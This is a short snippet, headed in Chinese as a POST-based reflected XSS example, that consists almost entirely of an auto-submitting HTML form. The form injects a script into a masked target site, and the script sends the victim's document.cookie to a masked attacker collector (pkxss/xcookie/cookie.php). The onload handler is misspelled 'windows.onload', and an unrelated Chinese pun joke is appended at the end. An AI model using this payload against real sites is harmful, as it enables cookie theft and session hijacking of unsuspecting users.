反射型XSS（POST方式）

<html>
<head>
<script>
windows.onload = function(){
    document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="https://**.com/**.htm">
    <input id= "xssr_in" type="text"  name="message" value=
    "<script>
document.location = 'http://****/pkxss/xcookie/cookie.php?cookie=' + document.cookie;
    </script>"
    />
    <input id="postsubmit" type="submit" name="submit" value="submit" />

</form>
</body>
</html>

奶奶问孙子：4+1等于几孙子说：等于6-1。奶奶说：你明明知道答案，为什么不说？孙子说：年轻人不讲5的……..